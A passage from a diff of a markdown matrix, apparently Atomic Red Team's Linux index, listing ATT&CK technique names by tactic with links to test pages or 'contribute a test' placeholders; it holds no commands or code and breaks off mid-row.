Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File Deletion](../../T1070.004/T1070.004.md) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Local Account](../../T1136.001/T1136.001.md) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Systemd Service](../../T1543.002/T1543.002.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | -| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Trap](../../T1546.005/T1546.005.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information 